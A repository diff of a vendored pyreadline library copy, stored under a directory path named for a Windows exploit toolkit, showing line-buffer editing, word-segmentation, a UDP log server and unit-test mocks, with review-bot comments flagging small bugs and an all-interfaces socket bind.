|
||||
NextWord = NextWord()
|
||||
|
||||
class PrevWord(LineSlice):
|
||||
def __call__(self, line):
|
||||
work = TextLine(line)
|
||||
work.point = PrevWordEnd
|
||||
stop = work.point
|
||||
start = PrevWordStart(work)
|
||||
return slice(start, stop)
|
||||
PrevWord = PrevWord()
|
||||
|
||||
class PointSlice(LineSlice):
|
||||
def __call__(self, line):
|
||||
return slice(Point(line), Point(line) + 1, None)
|
||||
PointSlice = PointSlice()
|
||||
|
||||
|
||||
############### TextLine ######################
|
||||
|
||||
class TextLine(object):
|
||||
def __init__(self, txtstr, point = None, mark = None):
|
||||
self.line_buffer = []
|
||||
self._point = 0
|
||||
self.mark = -1
|
||||
self.undo_stack = []
|
||||
self.overwrite = False
|
||||
if isinstance(txtstr, TextLine): #copy
|
||||
self.line_buffer = txtstr.line_buffer[:]
|
||||
if point is None:
|
||||
self.point = txtstr.point
|
||||
else:
|
||||
self.point = point
|
||||
if mark is None:
|
||||
self.mark = txtstr.mark
|
||||
else:
|
||||
self.mark = mark
|
||||
else:
|
||||
self._insert_text(txtstr)
|
||||
if point is None:
|
||||
self.point = 0
|
||||
else:
|
||||
self.point = point
|
||||
if mark is None:
|
||||
self.mark = -1
|
||||
else:
|
||||
self.mark = mark
|
||||
|
||||
self.is_word_token = wordmatcher.is_word_token
|
||||
self.next_start_segment = wordmatcher.next_start_segment
|
||||
self.next_end_segment = wordmatcher.next_end_segment
|
||||
self.prev_start_segment = wordmatcher.prev_start_segment
|
||||
self.prev_end_segment = wordmatcher.prev_end_segment
|
||||
|
||||
def push_undo(self):
|
||||
ltext = self.get_line_text()
|
||||
if self.undo_stack and ltext == self.undo_stack[-1].get_line_text():
|
||||
self.undo_stack[-1].point = self.point
|
||||
else:
|
||||
self.undo_stack.append(self.copy())
|
||||
|
||||
def pop_undo(self):
|
||||
if len(self.undo_stack) >= 2:
|
||||
self.undo_stack.pop()
|
||||
self.set_top_undo()
|
||||
self.undo_stack.pop()
|
||||
else:
|
||||
self.reset_line()
|
||||
self.undo_stack = []
|
||||
|
||||
def set_top_undo(self):
|
||||
if self.undo_stack:
|
||||
undo = self.undo_stack[-1]
|
||||
self.line_buffer = undo.line_buffer
|
||||
self.point = undo.point
|
||||
self.mark = undo.mark
|
||||
else:
|
||||
pass
|
||||
|
||||
def __repr__(self):
|
||||
return u'TextLine("%s",point=%s,mark=%s)'%(self.line_buffer, self.point, self.mark)
|
||||
|
||||
def copy(self):
|
||||
return self.__class__(self)
|
||||
|
||||
def set_point(self,value):
|
||||
if isinstance(value, LinePositioner):
|
||||
value = value(self)
|
||||
assert (value <= len(self.line_buffer))
|
||||
if value > len(self.line_buffer):
|
||||
value = len(self.line_buffer)
|
||||
self._point = value
|
||||
def get_point(self):
|
||||
return self._point
|
||||
point = property(get_point, set_point)
|
||||
|
||||
|
||||
def visible_line_width(self, position = Point):
|
||||
"""Return the visible width of the text in line buffer up to position."""
|
||||
extra_char_width = len([ None for c in self[:position].line_buffer if 0x2013 <= ord(c) <= 0xFFFD])
|
||||
return len(self[:position].quoted_text()) + self[:position].line_buffer.count(u"\t")*7 + extra_char_width
|
||||
|
||||
def quoted_text(self):
|
||||
quoted = [ quote_char(c) for c in self.line_buffer ]
|
||||
self.line_char_width = [ len(c) for c in quoted ]
|
||||
return u''.join(map(ensure_unicode, quoted))
|
||||
|
||||
def get_line_text(self):
|
||||
buf = self.line_buffer
|
||||
buf = map(ensure_unicode, buf)
|
||||
return u''.join(buf)
|
||||
|
||||
def set_line(self, text, cursor = None):
|
||||
self.line_buffer = [ c for c in str(text) ]
|
||||
if cursor is None:
|
||||
self.point = len(self.line_buffer)
|
||||
else:
|
||||
self.point = cursor
|
||||
|
||||
def reset_line(self):
|
||||
self.line_buffer = []
|
||||
self.point = 0
|
||||
|
||||
def end_of_line(self):
|
||||
self.point = len(self.line_buffer)
|
||||
|
||||
def _insert_text(self, text, argument=1):
|
||||
text = text * argument
|
||||
if self.overwrite:
|
||||
for c in text:
|
||||
#if self.point:
|
||||
self.line_buffer[self.point] = c
|
||||
self.point += 1
|
||||
else:
|
||||
for c in text:
|
||||
self.line_buffer.insert(self.point, c)
|
||||
self.point += 1
|
||||
|
||||
def __getitem__(self, key):
|
||||
#Check if key is LineSlice, convert to regular slice
|
||||
#and continue processing
|
||||
if isinstance(key, LineSlice):
|
||||
key = key(self)
|
||||
if isinstance(key, slice):
|
||||
if key.step is None:
|
||||
pass
|
||||
else:
|
||||
raise Error
|
||||
if key.start is None:
|
||||
start = StartOfLine(self)
|
||||
elif isinstance(key.start,LinePositioner):
|
||||
start = key.start(self)
|
||||
else:
|
||||
start = key.start
|
||||
if key.stop is None:
|
||||
stop = EndOfLine(self)
|
||||
elif isinstance(key.stop, LinePositioner):
|
||||
stop = key.stop(self)
|
||||
else:
|
||||
stop = key.stop
|
||||
return self.__class__(self.line_buffer[start:stop], point=0)
|
||||
elif isinstance(key, LinePositioner):
|
||||
return self.line_buffer[key(self)]
|
||||
elif isinstance(key, tuple):
|
||||
raise IndexError(u"Cannot use step in line buffer indexing") #Multiple slice not allowed
|
||||
else:
|
||||
# return TextLine(self.line_buffer[key])
|
||||
return self.line_buffer[key]
|
||||
|
||||
def __delitem__(self, key):
|
||||
point = self.point
|
||||
if isinstance(key, LineSlice):
|
||||
key = key(self)
|
||||
if isinstance(key, slice):
|
||||
start = key.start
|
||||
stop = key.stop
|
||||
if isinstance(start, LinePositioner):
|
||||
start = start(self)
|
||||
elif start is None:
|
||||
start=0
|
||||
if isinstance(stop, LinePositioner):
|
||||
stop = stop(self)
|
||||
elif stop is None:
|
||||
stop = EndOfLine(self)
|
||||
elif isinstance(key, LinePositioner):
|
||||
start = key(self)
|
||||
stop = start + 1
|
||||
else:
|
||||
start = key
|
||||
stop = key + 1
|
||||
prev = self.line_buffer[:start]
|
||||
rest = self.line_buffer[stop:]
|
||||
self.line_buffer = prev + rest
|
||||
if point > stop:
|
||||
self.point = point - (stop - start)
|
||||
elif point >= start and point <= stop:
|
||||
self.point = start
|
||||
|
||||
|
||||
def __setitem__(self, key, value):
|
||||
if isinstance(key, LineSlice):
|
||||
key = key(self)
|
||||
if isinstance(key, slice):
|
||||
start = key.start
|
||||
stop = key.stop
|
||||
elif isinstance(key, LinePositioner):
|
||||
start = key(self)
|
||||
stop = start + 1
|
||||
else:
|
||||
start = key
|
||||
stop = key + 1
|
||||
prev = self.line_buffer[:start]
|
||||
value = self.__class__(value).line_buffer
|
||||
rest = self.line_buffer[stop:]
|
||||
out = prev + value + rest
|
||||
if len(out) >= len(self):
|
||||
self.point = len(self)
|
||||
self.line_buffer = out
|
||||
|
||||
def __len__(self):
|
||||
return len(self.line_buffer)
|
||||
|
||||
def upper(self):
|
||||
self.line_buffer = [x.upper() for x in self.line_buffer]
|
||||
return self
|
||||
|
||||
def lower(self):
|
||||
self.line_buffer = [x.lower() for x in self.line_buffer]
|
||||
return self
|
||||
|
||||
def capitalize(self):
|
||||
self.set_line(self.get_line_text().capitalize(), self.point)
|
||||
return self
|
||||
|
||||
def startswith(self, txt):
|
||||
return self.get_line_text().startswith(txt)
|
||||
|
||||
def endswith(self, txt):
|
||||
return self.get_line_text().endswith(txt)
|
||||
|
||||
def __contains__(self, txt):
|
||||
return txt in self.get_line_text()
|
||||
|
||||
|
||||
lines = [TextLine(u"abc"),
|
||||
TextLine(u"abc def"),
|
||||
TextLine(u"abc def ghi"),
|
||||
TextLine(u" abc def "),
|
||||
]
|
||||
l = lines[2]
|
||||
l.point = 5
|
||||
|
||||
|
||||
|
||||
class ReadLineTextBuffer(TextLine):
|
||||
def __init__(self,txtstr, point = None, mark = None):
|
||||
super(ReadLineTextBuffer, self).__init__(txtstr, point, mark)
|
||||
self.enable_win32_clipboard = True
|
||||
self.selection_mark = -1
|
||||
self.enable_selection = True
|
||||
self.kill_ring = []
|
||||
|
||||
def __repr__(self):
|
||||
return u'ReadLineTextBuffer'\
|
||||
u'("%s",point=%s,mark=%s,selection_mark=%s)'%\
|
||||
(self.line_buffer, self.point, self.mark,self.selection_mark)
|
||||
|
||||
|
||||
def insert_text(self, char, argument=1):
|
||||
self.delete_selection()
|
||||
self.selection_mark = -1
|
||||
self._insert_text(char, argument)
|
||||
|
||||
def to_clipboard(self):
|
||||
if self.enable_win32_clipboard:
|
||||
clipboard.set_clipboard_text(self.get_line_text())
|
||||
|
||||
######### Movement
|
||||
|
||||
def beginning_of_line(self):
|
||||
self.selection_mark = -1
|
||||
self.point = StartOfLine
|
||||
|
||||
def end_of_line(self):
|
||||
self.selection_mark = -1
|
||||
self.point = EndOfLine
|
||||
|
||||
def forward_char(self,argument = 1):
|
||||
if argument < 0:
|
||||
self.backward_char(-argument)
|
||||
self.selection_mark = -1
|
||||
for x in range(argument):
|
||||
self.point = NextChar
|
||||
|
||||
def backward_char(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_char(-argument)
|
||||
self.selection_mark = -1
|
||||
for x in range(argument):
|
||||
self.point = PrevChar
|
||||
|
||||
def forward_word(self,argument=1):
|
||||
if argument<0:
|
||||
self.backward_word(-argument)
|
||||
self.selection_mark=-1
|
||||
for x in range(argument):
|
||||
self.point = NextWordStart
|
||||
|
||||
def backward_word(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_word(-argument)
|
||||
self.selection_mark = -1
|
||||
for x in range(argument):
|
||||
self.point = PrevWordStart
|
||||
|
||||
def forward_word_end(self, argument=1):
|
||||
if argument < 0:
|
||||
self.backward_word_end(-argument)
|
||||
self.selection_mark = -1
|
||||
for x in range(argument):
|
||||
self.point = NextWordEnd
|
||||
|
||||
def backward_word_end(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_word_end(-argument)
|
||||
self.selection_mark = -1
|
||||
for x in range(argument):
|
||||
self.point = NextWordEnd
|
||||
|
||||
######### Movement select
|
||||
def beginning_of_line_extend_selection(self):
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
self.point = StartOfLine
|
||||
|
||||
def end_of_line_extend_selection(self):
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
self.point = EndOfLine
|
||||
|
||||
def forward_char_extend_selection(self,argument=1):
|
||||
if argument < 0:
|
||||
self.backward_char_extend_selection(-argument)
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
for x in range(argument):
|
||||
self.point = NextChar
|
||||
|
||||
def backward_char_extend_selection(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_char_extend_selection(-argument)
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
for x in range(argument):
|
||||
self.point = PrevChar
|
||||
|
||||
def forward_word_extend_selection(self, argument=1):
|
||||
if argument < 0:
|
||||
self.backward_word_extend_selection(-argument)
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
for x in range(argument):
|
||||
self.point = NextWordStart
|
||||
|
||||
def backward_word_extend_selection(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_word_extend_selection(-argument)
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
for x in range(argument):
|
||||
self.point = PrevWordStart
|
||||
|
||||
|
||||
def forward_word_end_extend_selection(self, argument=1):
|
||||
if argument < 0:
|
||||
self.backward_word_end_extend_selection(-argument)
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
for x in range(argument):
|
||||
self.point = NextWordEnd
|
||||
|
||||
def backward_word_end_extend_selection(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_word_end_extend_selection(-argument)
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
for x in range(argument):
|
||||
self.point = PrevWordEnd
|
||||
|
||||
|
||||
######### delete
|
||||
|
||||
def delete_selection(self):
|
||||
if self.enable_selection and self.selection_mark >= 0:
|
||||
if self.selection_mark < self.point:
|
||||
del self[self.selection_mark:self.point]
|
||||
self.selection_mark = -1
|
||||
else:
|
||||
del self[self.point:self.selection_mark]
|
||||
self.selection_mark = -1
|
||||
return True
|
||||
else:
|
||||
self.selection_mark = -1
|
||||
return False
|
||||
|
||||
def delete_char(self, argument=1):
|
||||
if argument < 0:
|
||||
self.backward_delete_char(-argument)
|
||||
if self.delete_selection():
|
||||
argument -= 1
|
||||
for x in range(argument):
|
||||
del self[Point]
|
||||
|
||||
def backward_delete_char(self, argument=1):
|
||||
if argument < 0:
|
||||
self.delete_char(-argument)
|
||||
if self.delete_selection():
|
||||
argument -= 1
|
||||
for x in range(argument):
|
||||
if self.point > 0:
|
||||
self.backward_char()
|
||||
self.delete_char()
|
||||
|
||||
def forward_delete_word(self, argument=1):
|
||||
if argument < 0:
|
||||
self.backward_delete_word(-argument)
|
||||
if self.delete_selection():
|
||||
argument -= 1
|
||||
for x in range(argument):
|
||||
del self[Point:NextWordStart]
|
||||
|
||||
def backward_delete_word(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_delete_word(-argument)
|
||||
if self.delete_selection():
|
||||
argument -= 1
|
||||
for x in range(argument):
|
||||
del self[PrevWordStart:Point]
|
||||
|
||||
def delete_current_word(self):
|
||||
if not self.delete_selection():
|
||||
del self[CurrentWord]
|
||||
self.selection_mark =- 1
|
||||
|
||||
def delete_horizontal_space(self):
|
||||
if self[Point] in " \t":
|
||||
del self[PrevWordEnd:NextWordStart]
|
||||
self.selection_mark = -1
|
||||
######### Case
|
||||
|
||||
def upcase_word(self):
|
||||
p = self.point
|
||||
try:
|
||||
self[CurrentWord] = self[CurrentWord].upper()
|
||||
self.point = p
|
||||
except NotAWordError:
|
||||
pass
|
||||
|
||||
def downcase_word(self):
|
||||
p = self.point
|
||||
try:
|
||||
self[CurrentWord] = self[CurrentWord].lower()
|
||||
self.point = p
|
||||
except NotAWordError:
|
||||
pass
|
||||
|
||||
def capitalize_word(self):
|
||||
p = self.point
|
||||
try:
|
||||
self[CurrentWord] = self[CurrentWord].capitalize()
|
||||
self.point = p
|
||||
except NotAWordError:
|
||||
pass
|
||||
########### Transpose
|
||||
def transpose_chars(self):
|
||||
p2 = Point(self)
|
||||
if p2 == 0:
|
||||
return
|
||||
elif p2 == len(self):
|
||||
p2 = p2 - 1
|
||||
p1 = p2 - 1
|
||||
self[p2], self[p1] = self[p1], self[p2]
|
||||
self.point = p2 + 1
|
||||
|
||||
def transpose_words(self):
|
||||
word1 = TextLine(self)
|
||||
word2 = TextLine(self)
|
||||
if self.point == len(self):
|
||||
word2.point = PrevWordStart
|
||||
word1.point = PrevWordStart(word2)
|
||||
else:
|
||||
word1.point = PrevWordStart
|
||||
word2.point = NextWordStart
|
||||
stop1 = NextWordEnd(word1)
|
||||
stop2 = NextWordEnd(word2)
|
||||
start1 = word1.point
|
||||
start2 = word2.point
|
||||
self[start2:stop2] = word1[Point:NextWordEnd]
|
||||
self[start1:stop1] = word2[Point:NextWordEnd]
|
||||
self.point = stop2
|
||||
|
||||
|
||||
############ Kill
|
||||
|
||||
def kill_line(self):
|
||||
self.add_to_kill_ring(self[self.point:])
|
||||
del self.line_buffer[self.point:]
|
||||
|
||||
def kill_whole_line(self):
|
||||
self.add_to_kill_ring(self[:])
|
||||
del self[:]
|
||||
|
||||
def backward_kill_line(self):
|
||||
del self[StartOfLine:Point]
|
||||
|
||||
def unix_line_discard(self):
|
||||
del self[StartOfLine:Point]
|
||||
pass
|
||||
|
||||
def kill_word(self):
|
||||
"""Kills to next word ending"""
|
||||
del self[Point:NextWordEnd]
|
||||
|
||||
def backward_kill_word(self):
|
||||
"""Kills to next word ending"""
|
||||
if not self.delete_selection():
|
||||
del self[PrevWordStart:Point]
|
||||
self.selection_mark = -1
|
||||
|
||||
def forward_kill_word(self):
|
||||
"""Kills to next word ending"""
|
||||
if not self.delete_selection():
|
||||
del self[Point:NextWordEnd]
|
||||
self.selection_mark = -1
|
||||
|
||||
def unix_word_rubout(self):
|
||||
if not self.delete_selection():
|
||||
del self[PrevSpace:Point]
|
||||
self.selection_mark = -1
|
||||
|
||||
def kill_region(self):
|
||||
pass
|
||||
|
||||
def copy_region_as_kill(self):
|
||||
pass
|
||||
|
||||
def copy_backward_word(self):
|
||||
pass
|
||||
|
||||
def copy_forward_word(self):
|
||||
pass
|
||||
|
||||
|
||||
def yank(self):
|
||||
self.paste_from_kill_ring()
|
||||
|
||||
def yank_pop(self):
|
||||
pass
|
||||
|
||||
############## Mark
|
||||
|
||||
def set_mark(self):
|
||||
self.mark = self.point
|
||||
|
||||
def exchange_point_and_mark(self):
|
||||
pass
|
||||
|
||||
|
||||
def copy_region_to_clipboard(self): # ()
|
||||
u'''Copy the text in the region to the windows clipboard.'''
|
||||
if self.enable_win32_clipboard:
|
||||
mark = min(self.mark, len(self.line_buffer))
|
||||
cursor = min(self.point, len(self.line_buffer))
|
||||
if self.mark == -1:
|
||||
return
|
||||
begin = min(cursor, mark)
|
||||
end = max(cursor, mark)
|
||||
toclipboard = u"".join(self.line_buffer[begin:end])
|
||||
clipboard.SetClipboardText(toclipboard)
|
||||
|
||||
def copy_selection_to_clipboard(self): # ()
|
||||
u'''Copy the text in the region to the windows clipboard.'''
|
||||
if self.enable_win32_clipboard and self.enable_selection and self.selection_mark >= 0:
|
||||
selection_mark = min(self.selection_mark,len(self.line_buffer))
|
||||
cursor = min(self.point,len(self.line_buffer))
|
||||
if self.selection_mark == -1:
|
||||
return
|
||||
begin = min(cursor, selection_mark)
|
||||
end = max(cursor, selection_mark)
|
||||
toclipboard = u"".join(self.line_buffer[begin:end])
|
||||
clipboard.SetClipboardText(toclipboard)
|
||||
|
||||
|
||||
def cut_selection_to_clipboard(self): # ()
|
||||
self.copy_selection_to_clipboard()
|
||||
self.delete_selection()
|
||||
############## Paste
|
||||
|
||||
|
||||
############## Kill ring
|
||||
def add_to_kill_ring(self,txt):
|
||||
self.kill_ring = [txt]
|
||||
if kill_ring_to_clipboard:
|
||||
clipboard.SetClipboardText(txt.get_line_text())
|
||||
|
||||
|
||||
def paste_from_kill_ring(self):
|
||||
if self.kill_ring:
|
||||
self.insert_text(self.kill_ring[0])
|
||||
|
||||
|
||||
##################################################################
|
||||
q = ReadLineTextBuffer(u"asff asFArw ewrWErhg", point=8)
|
||||
q = TextLine(u"asff asFArw ewrWErhg", point=8)
|
||||
|
||||
def show_pos(buff, pos, chr = u"."):
|
||||
l = len(buff.line_buffer)
|
||||
def choice(bool):
|
||||
if bool:
|
||||
return chr
|
||||
else:
|
||||
return u" "
|
||||
return u"".join([choice(pos==idx) for idx in range(l + 1)])
|
||||
|
||||
|
||||
def test_positioner(buff, points, positioner):
|
||||
print (u" %s "%positioner.__class__.__name__).center(40, u"-")
|
||||
buffstr = buff.line_buffer
|
||||
|
||||
print u'"%s"'%(buffstr)
|
||||
for point in points:
|
||||
b = TextLine(buff, point = point)
|
||||
out=[u" "] * (len(buffstr) + 1)
|
||||
pos = positioner(b)
|
||||
if pos == point:
|
||||
out[pos] = u"&"
|
||||
else:
|
||||
out[point] = u"."
|
||||
out[pos] = u"^"
|
||||
print u'"%s"'%(u"".join(out))
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
print u'%-15s "%s"'%(u"Position", q.get_line_text())
|
||||
print u'%-15s "%s"'%(u"Point", show_pos(q, q.point))
|
||||
|
||||
|
||||
for name, positioner in all_positioners:
|
||||
pos = positioner(q)
|
||||
[]
|
||||
print u'%-15s "%s"'%(name, show_pos(q, pos, u"^"))
|
||||
|
||||
l = ReadLineTextBuffer(u"kjjk asads asad")
|
||||
l.point = EndOfLine
|
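Review bot: `raise Error` in the stepped-slice branch of `TextLine.__getitem__` names something this module never defines or imports (the visible imports are `re`, `operator`, `sys`, `wordmatcher`, `clipboard`, `log` and `ensure_unicode`), so indexing with a step raises NameError instead of the intended error; the neighbouring tuple-key branch already does it right, so this line should read `raise IndexError(u"Cannot use step in line buffer indexing")`. Two smaller inconsistencies in the same file: `k = Mark()` leaves `Mark` bound to the class while every other positioner rebinds its own name (`Mark = Mark()`), and `backward_word_end` moves the point with `NextWordEnd` where its selection twin `backward_word_end_extend_selection` uses `PrevWordEnd`, which looks like a copy-paste slip. The upstream copyright header suggests this is a vendored copy of pyreadline, so recording the upstream version it was taken from and carrying these fixes there would be safer than patching the copy in place.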
102
windows/exploits/ZIBE/pyreadline/lineeditor/wordmatcher.py
Normal file
102
windows/exploits/ZIBE/pyreadline/lineeditor/wordmatcher.py
Normal file
|
@ -0,0 +1,102 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
|
||||
import re, operator
|
||||
|
||||
|
||||
def str_find_all(str, ch):
|
||||
result = []
|
||||
index = 0
|
||||
while index >= 0:
|
||||
index = str.find(ch, index)
|
||||
if index >= 0:
|
||||
result.append(index)
|
||||
index += 1
|
||||
return result
|
||||
|
||||
|
||||
word_pattern = re.compile(u"(x*)")
|
||||
|
||||
def markwords(str, iswordfun):
|
||||
markers = {True : u"x", False : u"o"}
|
||||
return "".join([markers[iswordfun(ch)] for ch in str])
|
||||
|
||||
def split_words(str, iswordfun):
|
||||
return [x for x in word_pattern.split(markwords(str,iswordfun)) if x != u""]
|
||||
|
||||
def mark_start_segment(str, is_segment):
|
||||
def mark_start(s):
|
||||
if s[0:1] == u"x":
|
||||
return u"s" + s[1:]
|
||||
else:
|
||||
return s
|
||||
return u"".join(map(mark_start, split_words(str, is_segment)))
|
||||
|
||||
def mark_end_segment(str, is_segment):
|
||||
def mark_start(s):
|
||||
if s[0:1] == u"x":
|
||||
return s[:-1] + u"s"
|
||||
else:
|
||||
return s
|
||||
return u"".join(map(mark_start, split_words(str, is_segment)))
|
||||
|
||||
def mark_start_segment_index(str, is_segment):
|
||||
return str_find_all(mark_start_segment(str, is_segment), u"s")
|
||||
|
||||
def mark_end_segment_index(str, is_segment):
|
||||
return [x + 1 for x in str_find_all(mark_end_segment(str, is_segment), u"s")]
|
||||
|
||||
|
||||
################ Following are used in lineobj ###########################
|
||||
|
||||
def is_word_token(str):
|
||||
return not is_non_word_token(str)
|
||||
|
||||
def is_non_word_token(str):
|
||||
if len(str) != 1 or str in u" \t\n":
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
|
||||
def next_start_segment(str, is_segment):
|
||||
str = u"".join(str)
|
||||
result = []
|
||||
for start in mark_start_segment_index(str, is_segment):
|
||||
result[len(result):start] = [start for x in range(start - len(result))]
|
||||
result[len(result):len(str)] = [len(str) for x in range(len(str) - len(result) + 1)]
|
||||
return result
|
||||
|
||||
def next_end_segment(str, is_segment):
|
||||
str = u"".join(str)
|
||||
result = []
|
||||
for start in mark_end_segment_index(str, is_segment):
|
||||
result[len(result):start] = [start for x in range(start - len(result))]
|
||||
result[len(result):len(str)] = [len(str) for x in range(len(str) - len(result) + 1)]
|
||||
return result
|
||||
|
||||
|
||||
def prev_start_segment(str, is_segment):
|
||||
str = u"".join(str)
|
||||
result = []
|
||||
prev = 0
|
||||
for start in mark_start_segment_index(str, is_segment):
|
||||
result[len(result):start+1] = [prev for x in range(start - len(result) + 1)]
|
||||
prev=start
|
||||
result[len(result):len(str)] = [prev for x in range(len(str) - len(result) + 1)]
|
||||
return result
|
||||
|
||||
def prev_end_segment(str, is_segment):
|
||||
str = u"".join(str)
|
||||
result = []
|
||||
prev = 0
|
||||
for start in mark_end_segment_index(str, is_segment):
|
||||
result[len(result):start + 1] = [prev for x in range(start - len(result) + 1)]
|
||||
prev=start
|
||||
result[len(result):len(str)] = [len(str) for x in range(len(str) - len(result) + 1)]
|
||||
return result
|
||||
|
BIN
windows/exploits/ZIBE/pyreadline/logger.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/logger.pyc
Normal file
Binary file not shown.
57
windows/exploits/ZIBE/pyreadline/logserver.py
Normal file
57
windows/exploits/ZIBE/pyreadline/logserver.py
Normal file
|
@ -0,0 +1,57 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
import cPickle
|
||||
import logging
|
||||
import logging.handlers
|
||||
import SocketServer
|
||||
import struct,socket
|
||||
|
||||
try:
|
||||
import msvcrt
|
||||
except ImportError:
|
||||
msvcrt = None
|
||||
print u"problem"
|
||||
|
||||
|
||||
port = logging.handlers.DEFAULT_TCP_LOGGING_PORT
|
||||
host = u'localhost'
|
||||
|
||||
def check_key():
|
||||
if msvcrt is None:
|
||||
return False
|
||||
else:
|
||||
if msvcrt.kbhit() != 0:
|
||||
q = msvcrt.getch()
|
||||
return q
|
||||
return u""
|
||||
|
||||
|
||||
singleline=False
|
||||
|
||||
def main():
|
||||
print u"Starting TCP logserver on port:", port
|
||||
print u"Press q to quit logserver", port
|
||||
print u"Press c to clear screen", port
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
|
||||
s.bind((u"", port))
|
||||
s.settimeout(1)
|
||||
while 1:
|
||||
try:
|
||||
data, addr = s.recvfrom(100000)
|
||||
print data,
|
||||
except socket.timeout:
|
||||
key = check_key().lower()
|
||||
if u"q" == key:
|
||||
print u"Quitting logserver"
|
||||
break
|
||||
elif u"c" == key:
|
||||
print u"\n" * 100
|
||||
|
||||
if __name__ == u"__main__":
|
||||
main()
|
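Review bot: `s.bind((u"", port))` in `main` listens on every interface even though the module defines `host = u'localhost'` a few lines above and never uses it, so the log receiver accepts datagrams from any host that can reach the machine; binding to the declared host, `s.bind((host, port))`, keeps it local as the variable name implies. The received payload is also written to the terminal verbatim with `print data,`, so whatever reaches the port lands in the console unfiltered; if the listener is kept, stripping non-printable bytes before printing would be prudent. Minor: the two `print u"Press ..."` lines append `, port` to messages that do not refer to a port.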
BIN
windows/exploits/ZIBE/pyreadline/modes/__init__.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/modes/__init__.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/modes/basemode.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/modes/basemode.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/modes/emacs.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/modes/emacs.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/modes/notemacs.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/modes/notemacs.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/modes/vi.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/modes/vi.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/release.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/release.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/pyreadline/rlmain.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/rlmain.pyc
Normal file
Binary file not shown.
0
windows/exploits/ZIBE/pyreadline/test/__init__.py
Normal file
0
windows/exploits/ZIBE/pyreadline/test/__init__.py
Normal file
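--- a/windows/exploits/ZIBE/pyreadline/test/common.py
+++ b/windows/exploits/ZIBE/pyreadline/test/common.py
@@ -0,0 +1,82 @@
+# -*- coding: utf-8 -*-
+#*****************************************************************************
+# Copyright (C) 2006 Michael Graz. <mgraz@plan10.com>
+#
+# Distributed under the terms of the BSD License. The full license is in
+# the file COPYING, distributed as part of this software.
+#*****************************************************************************
+from pyreadline.modes.emacs import *
+from pyreadline import keysyms
+from pyreadline.lineeditor import lineobj
+from pyreadline.keysyms.common import make_KeyPress_from_keydescr
+
+import unittest
+class MockReadline:
+def __init__ (self):
+self.l_buffer=lineobj.ReadLineTextBuffer(u"")
+self._history=history.LineHistory()
+
+def add_history (self, line):
+self._history.add_history (lineobj.TextLine (line))
+
+def _print_prompt (self):
+pass
+
+def _bell (self):
+pass
+
+def insert_text(self, string):
+u'''Insert text into the command line.'''
+self.l_buffer.insert_text(string)
+
+
+class MockConsole:
+def __init__ (self):
+self.bell_count = 0
+self.text = ''
+
+def size (self):
+return (1, 1)
+
+def cursor(self, visible=None, size=None):
+pass
+
+def bell (self):
+self.bell_count += 1
+
+def write (self, text):
+self.text += text
+
+
+
+
+class Event:
+def __init__ (self, char):
+if char==u"escape":
+self.char=u'\x1b'
+elif char==u"backspace":
+self.char=u'\x08'
+elif char==u"tab":
+self.char=u'\t'
+elif char==u"space":
+self.char=u' '
+else:
+self.char = char
+
+def keytext_to_keyinfo_and_event (keytext):
+keyinfo = keysyms.common.make_KeyPress_from_keydescr (keytext)
+if len(keytext) == 3 and keytext[0] == u'"' and keytext[2] == u'"':
+event = Event (keytext[1])
+else:
+event = Event (keyinfo.tuple() [3])
+return keyinfo, event
+
+
+
+#override runTests from from main in unittest to remove sys.exit call
+class Tester(unittest.TestProgram):
+def runTests(self):
+if self.testRunner is None:
+self.testRunner = unittest.TextTestRunner(verbosity=self.verbosity)
+result = self.testRunner.run(self.test)
+# sys.exit(not result.wasSuccessful())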
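--- a/windows/exploits/ZIBE/pyreadline/test/test_emacs.py
+++ b/windows/exploits/ZIBE/pyreadline/test/test_emacs.py
@@ -0,0 +1,400 @@
+# -*- coding: utf-8 -*-
+#*****************************************************************************
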